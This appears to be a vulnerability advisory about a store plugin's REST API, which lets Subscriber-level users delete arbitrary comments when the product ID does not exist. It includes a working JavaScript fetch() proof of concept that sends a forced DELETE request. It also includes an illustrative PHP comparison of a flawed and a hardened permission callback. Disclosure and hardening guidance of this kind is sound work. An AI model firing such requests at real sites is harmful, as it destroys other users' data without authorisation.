The plugin does not have a proper authorisation check when deleting reviews via its REST API, which could allow any authenticated user, with privileges as low as Subscriber, to delete arbitrary comments.
Log in as any user (with privileges as low as Subscriber) and run the following JavaScript, e.g. from the browser console, against the target site. The product ID in the URL (1324 here) must not exist:

    fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "method": "DELETE",
      "credentials": "include"
    });

This permanently removes the comment with ID 2 (force=1 bypasses the trash and deletes outright).
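The PoC above only works when the product does not exist, which is the typical shape of a missing-authorisation bug where the permission check is tied to an object that may fail to load. The following is an added illustration written for this page, not the plugin's own code: a hypothetical permission callback that shows the flawed pattern beside a hardened one. Function names, messages and the assumption that deletion should require the WordPress moderate_comments capability are mine.

```php
<?php
// Added illustration, not the plugin's actual implementation.
// Hypothetical permission callbacks for
//   DELETE /wc/v2/products/<product_id>/reviews/<id>

// Flawed pattern (assumed for illustration): the capability check is only
// applied when the product loads. A non-existent product ID makes
// wc_get_product() return false, so the check is skipped and any logged-in
// user reaches the delete handler. This is the behaviour the PoC relies on.
function example_vulnerable_delete_review_permissions_check( WP_REST_Request $request ) {
    $product = wc_get_product( (int) $request['product_id'] );

    if ( $product && ! current_user_can( 'edit_product', $product->get_id() ) ) {
        return new WP_Error(
            'example_rest_cannot_delete',
            'Sorry, you cannot delete this resource.',
            array( 'status' => rest_authorization_required_code() )
        );
    }

    return true; // reached for ANY authenticated user when $product is false
}

// Hardened pattern: resolve the review first, refuse to proceed if it does not
// exist or is not a review, and require a capability that does not depend on
// whether the parent product can be loaded. moderate_comments is the core
// WordPress capability for deleting other users' comments (assumption: that is
// the right capability for this site's policy).
function example_hardened_delete_review_permissions_check( WP_REST_Request $request ) {
    $review = get_comment( (int) $request['id'] );

    if ( ! $review || 'review' !== get_comment_type( $review ) ) {
        return new WP_Error(
            'example_rest_review_invalid_id',
            'Invalid review ID.',
            array( 'status' => 404 )
        );
    }

    // Optional consistency check: the review must belong to the product in the URL.
    if ( (int) $review->comment_post_ID !== (int) $request['product_id'] ) {
        return new WP_Error(
            'example_rest_review_invalid_id',
            'Invalid review ID.',
            array( 'status' => 404 )
        );
    }

    if ( ! current_user_can( 'moderate_comments' ) ) {
        return new WP_Error(
            'example_rest_cannot_delete',
            'Sorry, you cannot delete this resource.',
            array( 'status' => rest_authorization_required_code() )
        );
    }

    return true;
}

// Where the callback plugs in (hypothetical namespace and handler name).
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/products/(?P<product_id>[\d]+)/reviews/(?P<id>[\d]+)', array(
        'methods'             => WP_REST_Server::DELETABLE,
        'callback'            => 'example_delete_review_handler',
        'permission_callback' => 'example_hardened_delete_review_permissions_check',
        'args'                => array(
            'force' => array( 'type' => 'boolean', 'default' => false ),
        ),
    ) );
} );
```

The practitioner's check when auditing a permission_callback: every early return of true must be reachable only after the capability test has actually run, and the capability must be evaluated against the object being acted on (the review), not an optional related object (the product) that an attacker can make absent.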
Krzysztof Zając
Yes
2022-02-23
2022-04-16